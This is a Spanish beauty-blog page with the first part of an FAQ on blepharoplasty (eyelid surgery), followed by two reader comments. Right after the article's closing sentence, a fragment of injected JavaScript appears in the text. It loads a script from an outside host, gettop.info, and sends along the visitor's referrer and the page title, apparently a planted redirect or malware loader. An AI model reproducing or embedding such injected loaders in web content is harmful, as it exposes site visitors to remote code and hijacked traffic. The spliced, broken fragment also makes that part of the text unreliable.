Salud y belleza » Cirugía estética

Blefaroplastia, preguntas frecuentes (I)

2 Comentarios

Naturalmente, antes de someterse a una intervención quirúrgica, el paciente debe agotar todas y cada una de sus dudas. De esta manera, el ejercicio se vuelve aún más sano: sin miedos, sin estrés, todos resulta mejor (para el médico, para todos). Especialmente, cuando se trata de alguna cirugía particular, estética, es decir no obligada, más bien del tipo selectiva, el trabajo de investigación resulta más importante aún.

Presentamos, a continuación, la primera parte de este repaso dividido en dos, acerca de la blefaroplastia: la cirugía para quitar las bolsas de los ojos.

¿Cuáles son los beneficios de la cirugía de párpados?

Con la blefaroplastia se consigue reducir, notablemente, la presencia de bolsas debajo de los ojos. También el síndrome de los párpados caídos. La región que encierra los ojos a veces puede lucir cansada y caída, por lo tanto con esta “refrescamiento” el rostro tomará otro color. Cambiará completamente.

¿La blefaroplastia también sirve para corregir las famosas “patas de gallo”?

Aunque la blefaroplastia no corrige las patas de gallo, si ayuda a disimularlas. La razón es sencilla: la cirugía de párpados se realiza globalmente con otros procedimientos que abarcan rellenos dérmicos, para eliminar las patas de gallo. Por ejemplo.

¡No te pierdas la segunda parte del artículo con todas las respuestas que aún restan conocer!if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

2 Comments »

  • Irene said:

    Normalmente la operación:

    Duración: Hora y media.
    Anestesia: Local y sedación.
    Ingreso: Ambulante.
    Recuperación: Incorporación laboral en 7 – 10 días.

    He extraido los datos de Clínica Bentacourt, en Madrid.

    http://www.clinicabetancourt.es/cirugia-plastica/plastica-y-estetica-facial/blefaroplastia.html

  • Maria said:

    Hola estoy muy contenta con la cirugía de parpados hacía pila que me la quería hacer, por suerte hoy en día me siento bien conmigo misma.No hay que tener miedo si estamos en manos de especialistas.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.